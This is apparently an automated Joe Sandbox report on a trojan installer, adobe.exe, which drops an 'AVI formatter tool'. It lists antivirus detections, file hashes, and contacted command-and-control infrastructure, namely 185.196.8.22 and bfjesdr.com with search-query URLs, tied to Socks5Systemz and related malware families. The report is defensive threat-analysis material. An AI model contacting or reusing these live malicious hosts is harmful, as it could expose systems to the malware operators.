C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\OptimFROG.dll (copy) | 0% | Virustotal |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_fx.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_fx.dll (copy) | 0% | Virustotal |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_ofr.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_ofr.dll (copy) | 1% | Virustotal |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_tta.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_tta.dll (copy) | 1% | Virustotal |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basscd.dll (copy) | 3% | ReversingLabs |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basscd.dll (copy) | 0% | Virustotal |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassflac.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassflac.dll (copy) | 0% | Virustotal |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassmidi.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassmidi.dll (copy) | 0% | Virustotal |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassmix.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassmix.dll (copy) | 0% | Virustotal |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassopus.dll (copy) | 3% | ReversingLabs |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassopus.dll (copy) | 0% | Virustotal |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basswma.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basswma.dll (copy) | 0% | Virustotal |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basswv.dll (copy) | 3% | ReversingLabs |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basswv.dll (copy) | 0% | Virustotal |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\d_writer.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\d_writer.dll (copy) | 0% | Virustotal |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\da.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\da.dll (copy) | 0% | Virustotal |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\daiso.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\daiso.dll (copy) | 0% | Virustotal |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\dsd2.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\dsd2.dll (copy) | 0% | Virustotal |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\dsd2pcmt.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\dsd2pcmt.dll (copy) | 0% | Virustotal |
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
http://www.mp3dev.org/ID3Error | 0% | URL Reputation | safe
http://ocsps.ssl.com0 | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | URL Reputation | safe
http://185.196.8.22/ | 0% | URL Reputation | safe
http://www.remobjects.com/psU | 0% | URL Reputation | safe
http://LosslessAudio.org/0 | 0% | URL Reputation | safe
http://lame.sf.net32bits | 0% | URL Reputation | safe
http://www.mp3dev.org/ | 0% | URL Reputation | safe
http://www.remobjects.com/ps | 0% | URL Reputation | safe
http://ocsps.ssl.com0Q | 0% | URL Reputation | safe
http://185.196.8.22/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14 | 100% | Avira URL Cloud | malware
http://www.innosetup.com/ | 0% | Avira URL Cloud | safe
http://185.196.8.22/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f | 100% | Avira URL Cloud | malware
http://bfjesdr.com/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608efa10c2ec9c9d3c | 0% | Avira URL Cloud | safe
http://185.196.8.22/nq | 100% | Avira URL Cloud | malware
http://www.mpg123.de | 0% | Avira URL Cloud | safe
http://bfjesdr.com/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 | 0% | Avira URL Cloud | safe
http://www.innosetup.com/ | 2% | Virustotal |
http://www.mpg123.de | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bfjesdr.com | 185.196.8.22 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://bfjesdr.com/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608efa10c2ec9c9d3c | false | Avira URL Cloud: safe | unknown
http://bfjesdr.com/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.innosetup.com/ | adobe.tmp, adobe.tmp, 00000001.00000000.1647787530.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-D26SF.tmp.1.dr, adobe.tmp.0.dr | false | 2% Virustotal; Avira URL Cloud: safe | unknown
https://gcc.gnu.org/bugs/): | is-L5R6H.tmp.1.dr | false | | high
http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0 | is-RTU9Q.tmp.1.dr | false | | high
https://sectigo.com/CPS0 | is-JAMVB.tmp.1.dr | false | URL Reputation: safe | unknown
http://ocsp.sectigo.com0 | is-JAMVB.tmp.1.dr | false | URL Reputation: safe | unknown
http://www.mp3dev.org/ID3Error | is-R0SOB.tmp.1.dr | false | URL Reputation: safe | unknown
http://185.196.8.22/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14 | aviformattertool.exe, 00000003.00000002.2904440169.00000000008AA000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://185.196.8.22/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f | aviformattertool.exe, 00000003.00000002.2905692727.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, aviformattertool.exe, 00000003.00000002.2905960096.000000000380C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://ocsps.ssl.com0 | is-RTU9Q.tmp.1.dr | false | URL Reputation: safe | unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | is-JAMVB.tmp.1.dr | false | URL Reputation: safe | unknown
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | is-JAMVB.tmp.1.dr | false | URL Reputation: safe | unknown
http://185.196.8.22/ | aviformattertool.exe, 00000003.00000002.2904440169.00000000008AA000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://185.196.8.22/nq | aviformattertool.exe, 00000003.00000002.2904440169.00000000008AA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.mpg123.de | is-B8D2L.tmp.1.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://crls.ssl.com/ssl.com-rsa-RootCA.crl0 | is-RTU9Q.tmp.1.dr | false | | high
http://www.remobjects.com/psU | adobe.exe, 00000000.00000003.1647104084.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, adobe.exe, 00000000.00000003.1647263045.0000000002298000.00000004.00001000.00020000.00000000.sdmp, adobe.tmp, 00000001.00000000.1647787530.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-D26SF.tmp.1.dr, adobe.tmp.0.dr | false | URL Reputation: safe | unknown
http://lame.sf.net | is-R0SOB.tmp.1.dr | false | | high
http://mingw-w64.sourceforge.net/X | is-OJAID.tmp.1.dr | false | | high
https://www.ssl.com/repository0 | is-RTU9Q.tmp.1.dr | false | | high
http://LosslessAudio.org/0 | is-NLBLP.tmp.1.dr | false | URL Reputation: safe | unknown
http://lame.sf.net32bits | is-R0SOB.tmp.1.dr | false | URL Reputation: safe | unknown
http://www.mp3dev.org/ | is-R0SOB.tmp.1.dr | false | URL Reputation: safe | unknown
http://www.remobjects.com/ps | adobe.exe, 00000000.00000003.1647104084.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, adobe.exe, 00000000.00000003.1647263045.0000000002298000.00000004.00001000.00020000.00000000.sdmp, adobe.tmp, adobe.tmp, 00000001.00000000.1647787530.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-D26SF.tmp.1.dr, adobe.tmp.0.dr | false | URL Reputation: safe | unknown
http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0 | is-RTU9Q.tmp.1.dr | false | | high
http://ocsps.ssl.com0Q | is-RTU9Q.tmp.1.dr | false | URL Reputation: safe | unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.196.8.22 | bfjesdr.com | Switzerland | 34888 | SIMPLECARRER2IT | false
65.109.80.185 | unknown | United States | 11022 | ALABANZA-BALTUS | false
                                Joe Sandbox version:38.0.0 Ammolite
                                Analysis ID:1374165
                                Start date and time:2024-01-13 06:31:06 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 7m 0s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:8
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:adobe.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@7/102@1/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 93%
                                • Number of executed functions: 204
                                • Number of non-executed functions: 259
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
06:32:31 | API Interceptor | 346781x Sleep call for process: aviformattertool.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
185.196.8.22 | Mnw1ycGC86.exe | malicious | LummaC, Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, Vidar
185.196.8.22 | Eks2sIqVXU.exe | malicious | LummaC, Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, Vidar
185.196.8.22 | SecuriteInfo.com.Heuristic.HEUR.AGEN.1332570.28515.9783.exe | malicious | Petite Virus, Socks5Systemz
185.196.8.22 | nuMb1lvY7r.exe | malicious | Petite Virus, Socks5Systemz
185.196.8.22 | fXkyYwWmQN.exe | malicious | Petite Virus, Socks5Systemz
185.196.8.22 | DDW1MYBYgo.exe | malicious | Petite Virus, Socks5Systemz
185.196.8.22 | XA8GMaaL52.exe | malicious | Petite Virus, Socks5Systemz
185.196.8.22 | DqhHo6K94H.exe | malicious | Petite Virus, Socks5Systemz
185.196.8.22 | scruurP1Ht.exe | malicious | Petite Virus, Socks5Systemz
185.196.8.22 | hMfGY6bjrA.exe | malicious | Petite Virus, Socks5Systemz
185.196.8.22 | Y1qP3rL3j7.exe | malicious | Petite Virus, Socks5Systemz
185.196.8.22 | 9u7RHI3bGw.exe | malicious | Petite Virus, Socks5Systemz
185.196.8.22 | j2po8ek0US.exe | malicious | Petite Virus, Socks5Systemz
185.196.8.22 | dG5B3oQKV8.exe | malicious | Petite Virus, Socks5Systemz
185.196.8.22 | E6Bljk3z1F.exe | malicious | Petite Virus, Socks5Systemz
185.196.8.22 | bGP2DebTbT.exe | malicious | Petite Virus, Socks5Systemz
185.196.8.22 | aneRE7M79c.exe | malicious | Petite Virus, Socks5Systemz
185.196.8.22 | 7f98dN1eC5.exe | malicious | Petite Virus, Socks5Systemz
185.196.8.22 | PK11kli186.exe | malicious | Petite Virus, Socks5Systemz
185.196.8.22 | UviATPIUxo.exe | malicious | Petite Virus, Socks5Systemz
65.109.80.185 | tuc6.exe | malicious | Petite Virus, Socks5Systemz
65.109.80.185 | Mnw1ycGC86.exe | malicious | LummaC, Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, Vidar
65.109.80.185 | Eks2sIqVXU.exe | malicious | LummaC, Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, Vidar
65.109.80.185 | SecuriteInfo.com.Heuristic.HEUR.AGEN.1332570.28515.9783.exe | malicious | Petite Virus, Socks5Systemz
65.109.80.185 | nuMb1lvY7r.exe | malicious | Petite Virus, Socks5Systemz
65.109.80.185 | fXkyYwWmQN.exe | malicious | Petite Virus, Socks5Systemz
65.109.80.185 | DDW1MYBYgo.exe | malicious | Petite Virus, Socks5Systemz
65.109.80.185 | XA8GMaaL52.exe | malicious | Petite Virus, Socks5Systemz
65.109.80.185 | DqhHo6K94H.exe | malicious | Petite Virus, Socks5Systemz
65.109.80.185 | scruurP1Ht.exe | malicious | Petite Virus, Socks5Systemz
65.109.80.185 | hMfGY6bjrA.exe | malicious | Petite Virus, Socks5Systemz
65.109.80.185 | Y1qP3rL3j7.exe | malicious | Petite Virus, Socks5Systemz
65.109.80.185 | j2po8ek0US.exe | malicious | Petite Virus, Socks5Systemz
65.109.80.185 | dG5B3oQKV8.exe | malicious | Petite Virus, Socks5Systemz
65.109.80.185 | aneRE7M79c.exe | malicious | Petite Virus, Socks5Systemz
65.109.80.185 | PK11kli186.exe | malicious | Petite Virus, Socks5Systemz
65.109.80.185 | k1g5QozhKy.exe | malicious | Petite Virus, Socks5Systemz
65.109.80.185 | JM9bMa9OuC.exe | malicious | Petite Virus, Socks5Systemz
65.109.80.185 | 3o57lm41vm.exe | malicious | Petite Virus, Socks5Systemz
65.109.80.185 | KGNPup2nbc.exe | malicious | Petite Virus, Socks5Systemz
No context

Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: SIMPLECARRER2IT
Mnw1ycGC86.exe | malicious | LummaC, Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, Vidar | 185.196.8.22
Eks2sIqVXU.exe | malicious | LummaC, Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, Vidar | 185.196.8.22
SecuriteInfo.com.Heuristic.HEUR.AGEN.1332570.28515.9783.exe | malicious | Petite Virus, Socks5Systemz | 185.196.8.22
nuMb1lvY7r.exe | malicious | Petite Virus, Socks5Systemz | 185.196.8.22
fXkyYwWmQN.exe | malicious | Petite Virus, Socks5Systemz | 185.196.8.22
DDW1MYBYgo.exe | malicious | Petite Virus, Socks5Systemz | 185.196.8.22
XA8GMaaL52.exe | malicious | Petite Virus, Socks5Systemz | 185.196.8.22
DqhHo6K94H.exe | malicious | Petite Virus, Socks5Systemz | 185.196.8.22
scruurP1Ht.exe | malicious | Petite Virus, Socks5Systemz | 185.196.8.22
hMfGY6bjrA.exe | malicious | Petite Virus, Socks5Systemz | 185.196.8.22
Y1qP3rL3j7.exe | malicious | Petite Virus, Socks5Systemz | 185.196.8.22
9u7RHI3bGw.exe | malicious | Petite Virus, Socks5Systemz | 185.196.8.22
j2po8ek0US.exe | malicious | Petite Virus, Socks5Systemz | 185.196.8.22
dG5B3oQKV8.exe | malicious | Petite Virus, Socks5Systemz | 185.196.8.22
E6Bljk3z1F.exe | malicious | Petite Virus, Socks5Systemz | 185.196.8.22
bGP2DebTbT.exe | malicious | Petite Virus, Socks5Systemz | 185.196.8.22
aneRE7M79c.exe | malicious | Petite Virus, Socks5Systemz | 185.196.8.22
7f98dN1eC5.exe | malicious | Petite Virus, Socks5Systemz | 185.196.8.22
PK11kli186.exe | malicious | Petite Virus, Socks5Systemz | 185.196.8.22
UviATPIUxo.exe | malicious | Petite Virus, Socks5Systemz | 185.196.8.22

Match: ALABANZA-BALTUS
tuc6.exe | malicious | Petite Virus, Socks5Systemz | 65.109.80.185
godTavyAZD.elf | malicious | Mirai | 64.176.126.31
Mnw1ycGC86.exe | malicious | LummaC, Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, Vidar | 65.109.80.185
Eks2sIqVXU.exe | malicious | LummaC, Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, Vidar | 65.109.80.185
SecuriteInfo.com.Heuristic.HEUR.AGEN.1332570.28515.9783.exe | malicious | Petite Virus, Socks5Systemz | 65.109.80.185
nuMb1lvY7r.exe | malicious | Petite Virus, Socks5Systemz | 65.109.80.185
fXkyYwWmQN.exe | malicious | Petite Virus, Socks5Systemz | 65.109.80.185
DDW1MYBYgo.exe | malicious | Petite Virus, Socks5Systemz | 65.109.80.185
XA8GMaaL52.exe | malicious | Petite Virus, Socks5Systemz | 65.109.80.185
DqhHo6K94H.exe | malicious | Petite Virus, Socks5Systemz | 65.109.80.185
scruurP1Ht.exe | malicious | Petite Virus, Socks5Systemz | 65.109.80.185
hMfGY6bjrA.exe | malicious | Petite Virus, Socks5Systemz | 65.109.80.185
Y1qP3rL3j7.exe | malicious | Petite Virus, Socks5Systemz | 65.109.80.185
j2po8ek0US.exe | malicious | Petite Virus, Socks5Systemz | 65.109.80.185
dG5B3oQKV8.exe | malicious | Petite Virus, Socks5Systemz | 65.109.80.185
aneRE7M79c.exe | malicious | Petite Virus, Socks5Systemz | 65.109.80.185
PK11kli186.exe | malicious | Petite Virus, Socks5Systemz | 65.109.80.185
k1g5QozhKy.exe | malicious | Petite Virus, Socks5Systemz | 65.109.80.185
JM9bMa9OuC.exe | malicious | Petite Virus, Socks5Systemz | 65.109.80.185
3o57lm41vm.exe | malicious | Petite Virus, Socks5Systemz | 65.109.80.185
No context

Match | Associated Sample Name / URL | Detection | Threat Name

Match: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\7z.exe (copy)
tuc4.exe | malicious | Petite Virus, Socks5Systemz
tuc2.exe | malicious | Petite Virus, Socks5Systemz
tuc6.exe | malicious | Petite Virus, Socks5Systemz
tuc5.exe | malicious | Petite Virus, Socks5Systemz
Mnw1ycGC86.exe | malicious | LummaC, Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, Vidar
Eks2sIqVXU.exe | malicious | LummaC, Glupteba, LummaC Stealer, Petite Virus, SmokeLoader, Socks5Systemz, Vidar
SecuriteInfo.com.Heuristic.HEUR.AGEN.1332570.28515.9783.exe | malicious | Petite Virus, Socks5Systemz
nuMb1lvY7r.exe | malicious | Petite Virus, Socks5Systemz
fXkyYwWmQN.exe | malicious | Petite Virus, Socks5Systemz
DDW1MYBYgo.exe | malicious | Petite Virus, Socks5Systemz
XA8GMaaL52.exe | malicious | Petite Virus, Socks5Systemz
DqhHo6K94H.exe | malicious | Petite Virus, Socks5Systemz
scruurP1Ht.exe | malicious | Petite Virus, Socks5Systemz
hMfGY6bjrA.exe | malicious | Petite Virus, Socks5Systemz
Y1qP3rL3j7.exe | malicious | Petite Virus, Socks5Systemz
9u7RHI3bGw.exe | malicious | Petite Virus, Socks5Systemz
j2po8ek0US.exe | malicious | Petite Virus, Socks5Systemz
dG5B3oQKV8.exe | malicious | Petite Virus, Socks5Systemz
E6Bljk3z1F.exe | malicious | Petite Virus, Socks5Systemz
bGP2DebTbT.exe | malicious | Petite Virus, Socks5Systemz
                                                                                                                                                        Process:C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1757184
                                                                                                                                                        Entropy (8bit):7.100391032754955
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:CAQ4shKtykNo8EEOSl9//ryooMLqSB1gmxAMGkTMWad6JNcED/RZVqL3zpUy0NuQ:CAshu19d/mwLqAgjga7n
                                                                                                                                                        MD5:354540FAD1E406C119F19FC2499E892C
                                                                                                                                                        SHA1:98CD46B576B5DE73E16994017103ED293332DDDC
                                                                                                                                                        SHA-256:492E0BA31524B734F4EB4C85C79384CAB14EF3271920C03724607FCAB9991063
                                                                                                                                                        SHA-512:20D95D55E5343AE5A52173F9A84772503EF36AA8C9615C62218564B29EFF82A346349AFFEC2C26D1350AFCE1A0D1B742C312A6E013FB568603A2D7CBA4F35BD4
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e..................................... ....@.................................b........................................%...........#........................................................................... ...............................text............................... ..`.rdata...#... ...0... ..............@..@.data.... ...P.......P..............@....rsrc....#.......0...`..............@..@_vset_8..@.......@..................`...........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4
                                                                                                                                                        Entropy (8bit):0.8112781244591328
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:bln:B
                                                                                                                                                        MD5:DBDF56957D6E4CFD0A3551C6B6191793
                                                                                                                                                        SHA1:9D12E4B32EC3558DD008BABB38FB85DD4DDD10B1
                                                                                                                                                        SHA-256:A508ABA2F9ECB586E66AF72AD7AE18A1B38F8A5BD61E5CA3022ABCDD081C0531
                                                                                                                                                        SHA-512:F0A1DF5E5AA1EB17E18AF7112A0CAD2AF543235481D3200F181309A07ED082392459FA772552FF357B68EEDB178F65CEFA325D7F1C66400E7D67DB69A845398A
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:....
                                                                                                                                                        Process:C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):128
                                                                                                                                                        Entropy (8bit):2.9545817380615236
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                                                                                                                        MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                                                                                                                        SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                                                                                                                        SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                                                                                                                        SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):128
                                                                                                                                                        Entropy (8bit):1.2701231977328944
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:WAmJuXDz8/:HHzc
                                                                                                                                                        MD5:0D6174E4525CFDED5DD1C9440B9DC1E7
                                                                                                                                                        SHA1:173EF30A035CE666278904625EADCFAE09233A47
                                                                                                                                                        SHA-256:458677CDF0E1A4E87D32AB67D6A5EEA9E67CB3545D79A21A0624E6BB5E1087E7
                                                                                                                                                        SHA-512:86DA96385985A1BA3D67A8676A041CA563838F474DF33D82B6ECD90C101703B30747121A6B7281E025A3C11CE28ACCEDFC94DB4E8D38E391199458056C2CD27A
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:ccddf9e705966c2f471db9..........................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):8
                                                                                                                                                        Entropy (8bit):2.0
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:kgln:kgl
                                                                                                                                                        MD5:499AE62316402A220844EBF1FC2682BF
                                                                                                                                                        SHA1:9DF275E32916B1BCE6D21F6C9B6015EBC50F4C15
                                                                                                                                                        SHA-256:06D87BD139932954B213115591FC07BACCB1A66C7C5222C47BF501905C0C71A2
                                                                                                                                                        SHA-512:417027486B0895874509F5029991D846B775AFCDF86BBABE0429054A8799C625366AC0E064D37CA01D442EBE239C333E56E360663A6573F7A6550A7AFBA6D825
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):1757184
                                                                                                                                                        Entropy (8bit):7.100391032754955
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:CAQ4shKtykNo8EEOSl9//ryooMLqSB1gmxAMGkTMWad6JNcED/RZVqL3zpUy0NuQ:CAshu19d/mwLqAgjga7n
                                                                                                                                                        MD5:354540FAD1E406C119F19FC2499E892C
                                                                                                                                                        SHA1:98CD46B576B5DE73E16994017103ED293332DDDC
                                                                                                                                                        SHA-256:492E0BA31524B734F4EB4C85C79384CAB14EF3271920C03724607FCAB9991063
                                                                                                                                                        SHA-512:20D95D55E5343AE5A52173F9A84772503EF36AA8C9615C62218564B29EFF82A346349AFFEC2C26D1350AFCE1A0D1B742C312A6E013FB568603A2D7CBA4F35BD4
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        Reputation:low
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):337408
                                                                                                                                                        Entropy (8bit):6.515131904432587
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
                                                                                                                                                        MD5:62D2156E3CA8387964F7AA13DD1CCD5B
                                                                                                                                                        SHA1:A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
                                                                                                                                                        SHA-256:59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
                                                                                                                                                        SHA-512:006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                        • Filename: tuc4.exe, Detection: malicious
                                                                                                                                                        • Filename: tuc2.exe, Detection: malicious
                                                                                                                                                        • Filename: tuc6.exe, Detection: malicious
                                                                                                                                                        • Filename: tuc5.exe, Detection: malicious
                                                                                                                                                        • Filename: Mnw1ycGC86.exe, Detection: malicious
                                                                                                                                                        • Filename: Eks2sIqVXU.exe, Detection: malicious
                                                                                                                                                        • Filename: SecuriteInfo.com.Heuristic.HEUR.AGEN.1332570.28515.9783.exe, Detection: malicious
                                                                                                                                                        • Filename: nuMb1lvY7r.exe, Detection: malicious
                                                                                                                                                        • Filename: fXkyYwWmQN.exe, Detection: malicious
